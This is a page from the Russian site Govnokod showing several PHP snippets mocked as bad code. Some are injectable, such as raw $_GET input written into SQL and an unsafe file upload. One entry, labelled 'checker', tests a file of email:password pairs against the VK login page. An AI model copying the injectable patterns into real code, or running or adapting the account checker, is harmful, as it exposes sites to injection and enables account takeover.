1. PHP / Говнокод #3666

    +167

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    if (($MEGA_PERM['access_edit_news']>=1)or($MEGA_PERM['access_correct_news']>=1)or($MEGA_PERM['access_final_news']>=1)or($MEGA_PERM['access_pedit_news']>=1)or($MEGA_PERM['access_pcorrect_news']>=1)or($MEGA_PERM['access_pfinal_news']>=1)) { $STATUS_PERM[2]='1'; $STATUS_PERM[7]='1'; $STATUS_PERM[14]='1';$STATUS_PERM[1]='1';}
if (($MEGA_PERM['access_edit_news']>=1)or($MEGA_PERM['access_correct_news']>=1)or($MEGA_PERM['access_final_news']>=1)or($MEGA_PERM['access_pedit_news']>=1)or($MEGA_PERM['access_pcorrect_news']>=1)or($MEGA_PERM['access_pfinal_news']>=1)) { $STATUS_PERM[8]='1'; $STATUS_PERM[15]='1';$STATUS_PERM[1]='1';}
if (($MEGA_PERM['access_edit_news']>=1)or($MEGA_PERM['access_correct_news']>=1)or($MEGA_PERM['access_final_news']>=1)or($MEGA_PERM['access_pedit_news']>=1)or($MEGA_PERM['access_pcorrect_news']>=1)or($MEGA_PERM['access_pfinal_news']>=1)) { $STATUS_PERM[9]='1'; $STATUS_PERM[16]='1';$STATUS_PERM[1]='1';}
if (($MEGA_PERM['access_edit_news']>=1)or($MEGA_PERM['access_correct_news']>=1)or($MEGA_PERM['access_final_news']>=1)or($MEGA_PERM['access_pedit_news']>=1)or($MEGA_PERM['access_pcorrect_news']>=1)or($MEGA_PERM['access_pfinal_news']>=1)) { $STATUS_PERM[2]='1'; $STATUS_PERM[3]='1'; $STATUS_PERM[11]='1';$STATUS_PERM[1]='1';}
if (($MEGA_PERM['access_edit_news']>=1)or($MEGA_PERM['access_correct_news']>=1)or($MEGA_PERM['access_final_news']>=1)or($MEGA_PERM['access_pedit_news']>=1)or($MEGA_PERM['access_pcorrect_news']>=1)or($MEGA_PERM['access_pfinal_news']>=1)) { $STATUS_PERM[4]='1'; $STATUS_PERM[12]='1';$STATUS_PERM[1]='1';}
if (($MEGA_PERM['access_edit_news']>=1)or($MEGA_PERM['access_correct_news']>=1)or($MEGA_PERM['access_final_news']>=1)or($MEGA_PERM['access_pedit_news']>=1)or($MEGA_PERM['access_pcorrect_news']>=1)or($MEGA_PERM['access_pfinal_news']>=1)) { $STATUS_PERM[5]='1'; $STATUS_PERM[13]='1';$STATUS_PERM[10]='1';$STATUS_PERM[1]='1';}

    Чудесная проверка прав доступа одного пхпшника =0
    (facepalm) Оло-ло 6 одинаковых условий...

    qbbr, 08 Июля 2010

    Комментарии (13)

  2. PHP / Говнокод #3660

    +168

    1. 1
    $order->UniqCode = substr(md5(uniqid()),0,3) . rand(10000, 99999);

    smart, 07 Июля 2010

    Комментарии (5)

  3. PHP / Говнокод #3659

    +162

    1. 1
    2. 2
    3. 3
    4. 4
    if(!$_GET['q']) die(header("HTTP/1.0 404 Not Found"));
$_GET['q'] = str_replace('sec/',false,$_GET['q']);
$_GET['q'] = str_replace('/files/',false,$_GET['q']);
pg_query('INSERT INTO download (date,file,ip) VALUES ('NOW()','" . $_GET['q'] . "', '{$_SERVER['REMOTE_ADDR']}')');

    принятие запроса из GET и запись в базу

    agent-0007, 07 Июля 2010

    Комментарии (16)

  4. PHP / Говнокод #3653

    +158

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    <?php  
// Подключаемься к базе данных  
require_once ("bd.php");  
 $query = 'SELECT MAX(id) AS `id` FROM `data`';  
        $result = mysql_query($query) or die("Query failed : " . mysql_error());  
/* Выводим результаты в html */ 
        $line = mysql_fetch_array($result, MYSQL_ASSOC);  
//================Настройки============= //  
$fotos_dir = "fotos/"; // Директория для фотографий 
$foto_name = $fotos_dir.time()."_".basename($_FILES['myfile']['name']); // Полное имя файла вместе с путем  
$foto_light_name = $line['id']+1; 
$foto_light_name2 = $foto_light_name.".".basename($_FILES['myfile']['type']); 
//$foto_light_name = time()."_".basename($_FILES['myfile']['name']); // Имя файла исключая путь  
// Текст ошибок  
$error_by_mysql = "<span style=\"font: bold 15px tahoma; color: red;\">Ошибка при добавлении данных в базу</span>";  
$error_by_file = "<span style=\"font: bold 15px tahoma; color: red;\">Невозможно загрузить файл в директорию. Возможно её не существует</span>";  
// Начало  
if(isset($_FILES["myfile"]))  
{  
$myfile = $_FILES["myfile"]["tmp_name"];  
$myfile_name = $_FILES["myfile"]["name"];  
$myfile_size = $_FILES["myfile"]["size"];  
$myfile_type = $_FILES["myfile"]["type"];  
$error_flag = $_FILES["myfile"]["error"];  
// Если ошибок не было  
if($error_flag == 0)  
{  
$DOCUMENT_ROOT = $_SERVER['DOCMENT_ROOT'];  
$upfile = getcwd()."\\fotos\\" ."site.ru_".$foto_light_name2;  
if ($_FILES['myfile']['tmp_name'])  
{  
//Если не удалось загрузить файл  
if (!move_uploaded_file($_FILES['myfile']['tmp_name'], $upfile))   
{  
echo "$error_by_file";  
exit;  
}  
}  
else  
{  
    echo 'Проблема: возможна атака через загрузку файла. ';  
    echo $_FILES['myfile']['name'];  
    exit;  
}  
// После удачной обработки файла, выводим сообщение  
echo "<h3>Результат добавления обоины:</h3> <br />";  
echo "Файл <b>".$foto_light_name2."</b> успешно добавлен<br />";  
// Заносим путь картинки в базу данных  
$q = "INSERT INTO data (foto,dir) VALUES ('$foto_light_name2','$fotos_dir')";  
$query = mysql_query($q);  
// Данные успешно внесены в базу данных, выводим сообщение  
if ($query == 'true') {  
echo "<br /><b>Данные успешно внесены в базу</b>";  
}  
// В противном случае, выводим ошибку при добавлении в базу данных  
else {  
echo "$error_by_mysql";  
}  
        }  
   
 elseif ($myfile_size == 0) {  
 echo "Пустая форма!";  
 }     
} 
?>

    оригинал http://forum.searchengines.ru/showpost.php?p=7226101&postcount=1 не шедевр, но говнокод присутствует.
    $DOCUMENT_ROOT = $_SERVER['DOCMENT_ROOT']; - это так логично ...

    GoodTalkBot, 07 Июля 2010

    Комментарии (19)

  5. PHP / Говнокод #3652

    +111

    1. 1
    2. 2
    3. 3
    4. 4
    5. 5
    6. 6
    7. 7
    if (!empty($_POST['fupload'])) //проверяем, отправил ли пользователь изображение
{
$fupload=$_POST['fupload']; $fupload = trim($fupload);
  if ($fupload =='' or empty($fupload)) {
                     unset($fupload);// если переменная $fupload пуста, то удаляем ее
					 }
}

    Кусочек из видео уроков Попова

    Vasiliy, 06 Июля 2010

    Комментарии (13)

  6. PHP / Говнокод #3649

    +131

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    $user_name=$_POST['user_name'];
$query = mysql_query("SElECT login FROM user") or die(mysql_error());
$existing_users = mysql_fetch_array($query);


if (in_array($user_name, $existing_users))
  {
				   echo "no";
			   }
		  else 
		       {
				   echo "yes";
			   }

    Проверка зареган ли такой пользователь

    Vasiliy, 06 Июля 2010

    Комментарии (16)

  7. PHP / Говнокод #3647

    +148

    1. 1
    $isOccupy=($valdet['isOccupy']=='1')?0:1;

    а все по тому что кое кто перепутал логику атрибута=\

    nur, 06 Июля 2010

    Комментарии (14)

  8. PHP / Говнокод #3646

    +171

    1. 1
    2. 2
    3. 3
    if(@$send_to_order and @$mail and @$name_person and @$tel_name and @$adr_name) {
/** тут еще много подобного интересного кода **/
}

    PHPShop. отсылка письма после осуществления заказа

    Under, 05 Июля 2010

    Комментарии (5)

  9. PHP / Говнокод #3644

    +149

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    <?
$txt_file=("logins.txt");
preg_match( "/value='(.*)'/", file_get_contents("http://login.vk.com/?act=login&[email protected]&pass=asdasd&expire=&vk="), $null );
foreach(file($txt_file) as $account)
{ 
$data=explode(':',$account);
$qwe = file_get_contents('http://login.vk.com/?act=login&email='.urlencode($data[0]).'&pass='.urlencode($data[1]).'&expire=&vk=');
if($qwe == $null){
       print "".$data[0].":".$data[1]." not valid</br>";
}else{ 
       print "".$data[0].":".$data[1]." are valid</br>"; 
  } 
  } 
?>

    checker

    r00t, 05 Июля 2010

    Комментарии (1)

  10. PHP / Говнокод #3643

    +176

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    67. 67
    68. 68
    69. 69
    70. 70
    71. 71
    72. 72
    73. 73
    74. 74
    75. 75
    76. 76
    77. 77
    78. 78
    79. 79
    80. 80
    81. 81
    82. 82
    83. 83
    84. 84
    85. 85
    86. 86
    87. 87
    88. 88
    89. 89
    90. 90
    91. 91
    //вторая форма
		$n2 = $_GET['n2'];//Компания
		$n10 = $_GET['n10'];//Ф.И.О:
		$n11 = $_GET['n11'];// Должность:
		$n12 = $_GET['n12'];//Телефон:
		$n13 = $_GET['n13'];//E-mail:
		$n14 = $_GET['n14'];//
		$n15 = $_GET['n15'];
		$n16 = $_GET['n16'];
		$n17 = $_GET['n17'];
		$n18 = $_GET['n18'];
		$n19 = $_GET['n19'];
		$n20 = $_GET['n20'];
		$n21 = $_GET['n21'];
		$n22 = $_GET['n22'];
		$n23 = $_GET['n23'];
		$n24 = $_GET['n24'];
		$n25 = $_GET['n25'];
		$n26 = $_GET['n26'];
		$n27 = $_GET['n27'];
		$n28 = $_GET['n28'];
		$n29 = $_GET['n29'];
		$n30 = $_GET['n30'];
		$n31 = $_GET['n31'];
		$n32 = $_GET['n32'];
		$n33 = $_GET['n33'];
		$n34 = $_GET['n34'];
		$n35 = $_GET['n35'];
		$n37 = $_GET['n37'];//value - другое:
		$n38 = $_GET['n38'];
		$n39 = $_GET['n39'];
		$n40 = $_GET['n40'];//new form - Картонные карты - Тираж(от 10 000 шт.): 
		$n41 = $_GET['n41'];
		$n42 = $_GET['n42'];
		$n43 = $_GET['n43'];
		$n44 = $_GET['n44'];
		$n45 = $_GET['n45'];
		$n46 = $_GET['n46'];
		$n47 = $_GET['n47'];//new form - Услуги сборки - Количество комплектов: 
		$n48 = $_GET['n48'];
		$n49 = $_GET['n49'];
		$n50 = $_GET['n50'];
		$n51 = $_GET['n51'];
		$n52 = $_GET['n52'];
		$n53 = $_GET['n53'];
		$n54 = $_GET['n54'];
		$n55 = $_GET['n55'];
		$n56 = $_GET['n56'];
		$n57 = $_GET['n57'];
		$n58 = $_GET['n58'];
		$n59 = $_GET['n59'];//new form - Мейлинг - Есть
		$n60 = $_GET['n60'];
		$n61 = $_GET['n61'];
		$n62 = $_GET['n62'];
		$n63 = $_GET['n63'];
		$n64 = $_GET['n64'];
		$n65 = $_GET['n65'];
		$n66 = $_GET['n66'];
		$n67 = $_GET['n67'];
		$n68 = $_GET['n68'];
		$n69 = $_GET['n69'];
		$n70 = $_GET['n70'];
		$n71 = $_GET['n71'];
		$n72 = $_GET['n72'];
		$n73 = $_GET['n73'];
		$n74 = $_GET['n74'];
		$n75 = $_GET['n75'];
		$n76 = $_GET['n76'];
		$n77 = $_GET['n77'];
		$n78 = $_GET['n78'];
		$n79 = $_GET['n79'];
		$n80 = $_GET['n80'];
		$n81 = $_GET['n81'];
		$n82 = $_GET['n82'];
		$n83 = $_GET['n83'];
		$n84 = $_GET['n84'];
		$n85 = $_GET['n85'];
		$n86 = $_GET['n86'];
		$n87 = $_GET['n87'];
		$n88 = $_GET['n88'];
		$n89 = $_GET['n89'];
		$n90 = $_GET['n90'];
		
		$subject2 = "Онлайн просчет";
		$headers2 = "MIME-Version: 1.0\n";
		$headers2 .= "Content-type: text/html; charset=utf-8\n";
		$text2 = "<table border='0' cellspacing='0' cellpadding='0' width='100%' align='center' bgcolor='#f0f0f0'> <tr> 
		<td><table border='0' cellspacing='0' cellpadding='0' width='600' align='center' bgcolor='#f0f0f0'> <tr> 
		<td width='178' height='50' valign='center'><font size='2'>&nbsp;&nbsp;&nbsp;Компания* :</font></td> <td 
		width='329'><input type=TEXT name='n2' value='".$n2."' readonly='readonly' size='49' style='border: 2; 
		background: #e2e2e2' /></td> </tr> <tr> <td height='50' valign='center'><font

    этот пиздец был найден в коде одного проекта на жумле, в файле темплейта
    в конечном итогде это все отправлялось на мыло

    krasnoukhov, 05 Июля 2010

    Комментарии (14)